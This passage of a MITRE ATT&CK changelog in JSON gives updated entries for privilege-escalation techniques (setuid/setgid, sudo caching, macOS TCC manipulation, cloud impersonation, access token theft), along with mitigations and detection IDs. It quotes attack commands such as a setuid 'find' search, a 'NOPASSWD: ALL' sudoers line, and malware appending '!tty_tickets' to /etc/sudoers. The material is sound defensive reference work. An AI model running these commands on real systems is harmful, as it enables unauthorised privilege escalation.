<tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">pe\"&nbsp;or&nbsp;other&nbsp;actions&nbsp;to&nbsp;bypass&nbsp;an&nbsp;execution&nbsp;environment&nbsp;with</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;execution&nbsp;environment&nbsp;with&nbsp;restricted&nbsp;permissions.&nbsp;&nbsp;Altern</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;restricted&nbsp;permissions.&nbsp;&nbsp;Alternatively,&nbsp;adversaries&nbsp;may&nbsp;cho</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">atively,&nbsp;adversaries&nbsp;may&nbsp;choose&nbsp;to&nbsp;find&nbsp;and&nbsp;target&nbsp;vulnerabl</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ose&nbsp;to&nbsp;find&nbsp;and&nbsp;target&nbsp;vulnerable&nbsp;binaries&nbsp;with&nbsp;the&nbsp;setuid&nbsp;o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;binaries&nbsp;with&nbsp;the&nbsp;setuid&nbsp;or&nbsp;setgid&nbsp;bits&nbsp;already&nbsp;enabled&nbsp;(i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;setgid&nbsp;bits&nbsp;already&nbsp;enabled&nbsp;(i.e.&nbsp;[File&nbsp;and&nbsp;Directory&nbsp;Disc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.e.&nbsp;[File&nbsp;and&nbsp;Directory&nbsp;Discovery](https://attack.mitre.org/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">overy](https://attack.mitre.org/techniques/T1083)).&nbsp;The&nbsp;setu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">techniques/T1083)).&nbsp;The&nbsp;setuid&nbsp;and&nbsp;setguid&nbsp;bits&nbsp;are&nbsp;indicate</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">id&nbsp;and&nbsp;setguid&nbsp;bits&nbsp;are&nbsp;indicated&nbsp;with&nbsp;an&nbsp;\"s\"&nbsp;instead&nbsp;of&nbsp;an&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;with&nbsp;an&nbsp;\"s\"&nbsp;instead&nbsp;of&nbsp;an&nbsp;\"x\"&nbsp;when&nbsp;viewing&nbsp;a&nbsp;file's&nbsp;attrib</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">\"x\"&nbsp;when&nbsp;viewing&nbsp;a&nbsp;file's&nbsp;attributes&nbsp;via&nbsp;&lt;code&gt;ls&nbsp;-l&lt;/code&gt;.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">utes&nbsp;via&nbsp;&lt;code&gt;ls&nbsp;-l&lt;/code&gt;.&nbsp;The&nbsp;&lt;code&gt;find&lt;/code&gt;&nbsp;command&nbsp;c</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;The&nbsp;&lt;code&gt;find&lt;/code&gt;&nbsp;command&nbsp;can&nbsp;also&nbsp;be&nbsp;used&nbsp;to&nbsp;search&nbsp;fo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">an&nbsp;also&nbsp;be&nbsp;used&nbsp;to&nbsp;search&nbsp;for&nbsp;such&nbsp;files.&nbsp;For&nbsp;example,&nbsp;&lt;code</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;such&nbsp;files.&nbsp;For&nbsp;example,&nbsp;&lt;code&gt;find&nbsp;/&nbsp;-perm&nbsp;+4000&nbsp;2&gt;/dev/n</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&gt;find&nbsp;/&nbsp;-perm&nbsp;+4000&nbsp;2&gt;/dev/null&lt;/code&gt;&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;find&nbsp;f</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ull&lt;/code&gt;&nbsp;can&nbsp;be&nbsp;used&nbsp;to&nbsp;find&nbsp;files&nbsp;with&nbsp;setuid&nbsp;set&nbsp;and&nbsp;&lt;co</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iles&nbsp;with&nbsp;setuid&nbsp;set&nbsp;and&nbsp;&lt;code&gt;find&nbsp;/&nbsp;-perm&nbsp;+2000&nbsp;2&gt;/dev/nul</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">de&gt;find&nbsp;/&nbsp;-perm&nbsp;+2000&nbsp;2&gt;/dev/null&lt;/code&gt;&nbsp;may&nbsp;be&nbsp;used&nbsp;for&nbsp;set</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&lt;/code&gt;&nbsp;may&nbsp;be&nbsp;used&nbsp;for&nbsp;setgid.&nbsp;Binaries&nbsp;that&nbsp;have&nbsp;these&nbsp;bi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">gid.&nbsp;Binaries&nbsp;that&nbsp;have&nbsp;these&nbsp;bits&nbsp;set&nbsp;may&nbsp;then&nbsp;be&nbsp;abused&nbsp;by</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ts&nbsp;set&nbsp;may&nbsp;then&nbsp;be&nbsp;abused&nbsp;by&nbsp;adversaries.(Citation:&nbsp;GTFOBins</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;adversaries.(Citation:&nbsp;GTFOBins&nbsp;Suid)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Suid)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1028: Operating System Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0110: Setuid/Setgid Privilege Abuse Detection (Linux/macOS)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-30 14:34:44.992000+00:00",
                    "modified": "2026-04-15 19:52:35.310000+00:00",
                    "name": "Sudo and Sudo Caching",
                    "description": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The <code>sudo</code> command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code>, which is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code>.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo \\'Defaults !tty_tickets\\' >> /etc/sudoers</code>.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1548/003",
                            "external_id": "T1548.003"
                        },
                        {
                            "source_name": "cybereason osx proton",
                            "description": "Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.",
                            "url": "https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does"
                        },
                        {
                            "source_name": "OSX.Dok Malware",
                            "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.",
                            "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/"
                        },
                        {
                            "source_name": "sudo man page 2018",
                            "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.",
                            "url": "https://www.sudo.ws/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:52:35.310000+00:00\", \"old_value\": \"2025-10-24 17:48:26.105000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][1]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1026: Privileged Account Management",
                            "M1028: Operating System Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0052: Behavioral Detection Strategy for Abuse of Sudo and Sudo Caching"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--e8a0a025-3601-4755-abfb-8d08283329fb",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-03-21 21:10:57.322000+00:00",
                    "modified": "2026-04-15 19:52:55.058000+00:00",
                    "name": "TCC Manipulation",
                    "description": "Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).\n\nWhen an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)\n\nAdversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)\n\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1548/006",
                            "external_id": "T1548.006"
                        },
                        {
                            "source_name": "welivesecurity TCC",
                            "description": "Marc-Etienne M.L\u00e9veill\u00e9. (2022, July 19). I see what you did there: A look at the CloudMensis macOS spyware. Retrieved March 21, 2024.",
                            "url": "https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/"
                        },
                        {
                            "source_name": "TCC Database",
                            "description": "Marina Liang. (2024, April 23). Return of the mac(OS): Transparency, Consent, and Control (TCC) Database Manipulation. Retrieved March 28, 2024.",
                            "url": "https://web.archive.org/web/20240411112413/https://interpressecurity.com/resources/return-of-the-macos-tcc/"
                        },
                        {
                            "source_name": "TCC macOS bypass",
                            "description": "Phil Stokes. (2021, July 1). Bypassing macOS TCC User Privacy Protections By Accident and Design. Retrieved March 21, 2024.",
                            "url": "https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Marina Liang",
                        "Wojciech Regu\u0142a @_r3ggi",
                        "Csaba Fitzl @theevilbit of Kandji"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:52:55.058000+00:00\", \"old_value\": \"2025-04-15 23:14:58.393000+00:00\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://web.archive.org/web/20240411112413/https://interpressecurity.com/resources/return-of-the-macos-tcc/\", \"old_value\": \"https://interpressecurity.com/resources/return-of-the-macos-tcc/\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][0]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1026: Privileged Account Management",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0534: TCC Database Manipulation via Launchctl and Unprotected SIP"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-07-10 16:37:15.672000+00:00",
                    "modified": "2026-04-15 19:53:18.398000+00:00",
                    "name": "Temporary Elevated Cloud Access",
                    "description": "Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. \n\nJust-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023)\n\nAccount impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) \n\nMany cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)\n\nWhile users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)\n\n**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1548/005",
                            "external_id": "T1548.005"
                        },
                        {
                            "source_name": "AWS PassRole",
                            "description": "AWS. (n.d.). Granting a user permissions to pass a role to an AWS service. Retrieved July 10, 2023.",
                            "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html"
                        },
                        {
                            "source_name": "CrowdStrike StellarParticle January 2022",
                            "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.",
                            "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/"
                        },
                        {
                            "source_name": "Google Cloud Just in Time Access 2023",
                            "description": "Google Cloud. (n.d.). Manage just-in-time privileged access to projects. Retrieved September 21, 2023.",
                            "url": "https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project"
                        },
                        {
                            "source_name": "Google Cloud Service Account Authentication Roles",
                            "description": "Google Cloud. (n.d.). Roles for service account authentication. Retrieved July 10, 2023.",
                            "url": "https://cloud.google.com/iam/docs/service-account-permissions"
                        },
                        {
                            "source_name": "Microsoft Impersonation and EWS in Exchange",
                            "description": "Microsoft. (2022, September 13). Impersonation and EWS in Exchange. Retrieved July 10, 2023.",
                            "url": "https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-ews-in-exchange"
                        },
                        {
                            "source_name": "Azure Just in Time Access 2023",
                            "description": "Microsoft. (2023, August 29). Configure and approve just-in-time access for Azure Managed Applications. Retrieved September 21, 2023.",
                            "url": "https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-in-time-access"
                        },
                        {
                            "source_name": "Rhino Security Labs AWS Privilege Escalation",
                            "description": "Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation \u2013 Methods and Mitigation. Retrieved May 27, 2022.",
                            "url": "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/"
                        },
                        {
                            "source_name": "Rhino Google Cloud Privilege Escalation",
                            "description": "Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform \u2013 Part 1 (IAM). Retrieved September 21, 2023.",
                            "url": "https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/"
                        },
                        {
                            "source_name": "Hunters Domain Wide Delegation Google Workspace 2023",
                            "description": "Yonatan Khanashvilli. (2023, November 28). DeleFriend: Severe design flaw in Domain Wide Delegation could leave Google Workspace vulnerable for takeover. Retrieved January 16, 2024.",
                            "url": "https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover"
                        },
                        {
                            "source_name": "Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023",
                            "description": "Zohar Zigdon. (2023, November 30). Exploring a Critical Risk in Google Workspace's Domain-Wide Delegation Feature. Retrieved January 16, 2024.",
                            "url": "https://unit42.paloaltonetworks.com/critical-risk-in-google-workspace-delegation-feature/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Arad Inbar, Fidelis Security"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "Office Suite",
                        "Identity Provider"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:53:18.398000+00:00\", \"old_value\": \"2025-04-15 23:15:17.608000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][1]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0393: Detection Strategy for Temporary Elevated Cloud Access Abuse (T1548.005)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-12-14 16:46:06.044000+00:00",
                    "modified": "2026-04-15 19:53:44.334000+00:00",
                    "name": "Access Token Manipulation",
                    "description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)\n\nAny standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1134",
                            "external_id": "T1134"
                        },
                        {
                            "source_name": "Pentestlab Token Manipulation",
                            "description": "netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017.",
                            "url": "https://pentestlab.blog/2017/04/03/token-manipulation/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Tom Ueltschi @c_APT_ure",
                        "Travis Smith, Tripwire",
                        "Robby Winchester, @robwinchester3",
                        "Jared Atkinson, @jaredcatkinson"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:53:44.334000+00:00\", \"old_value\": \"2025-10-24 17:49:29.051000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"BlackHat Atkinson Winchester Token Manipulation\", \"description\": \"Atkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017.\", \"url\": \"https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf\"}, \"root['external_references'][2]\": {\"source_name\": \"Microsoft Command-line Logging\", \"description\": \"Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.\", \"url\": \"https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\"}, \"root['external_references'][3]\": {\"source_name\": \"Microsoft LogonUser\", \"description\": \"Microsoft TechNet. (n.d.). Retrieved April 25, 2017.\", \"url\": \"https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx\"}, \"root['external_references'][4]\": {\"source_name\": \"Microsoft DuplicateTokenEx\", \"description\": \"Microsoft TechNet. (n.d.). Retrieved April 25, 2017.\", \"url\": \"https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx\"}, \"root['external_references'][5]\": {\"source_name\": \"Microsoft ImpersonateLoggedOnUser\", \"description\": \"Microsoft TechNet. (n.d.). Retrieved April 25, 2017.\", \"url\": \"https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0283: Behavior-chain detection for T1134 Access Token Manipulation on Windows"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-18 16:48:56.582000+00:00",
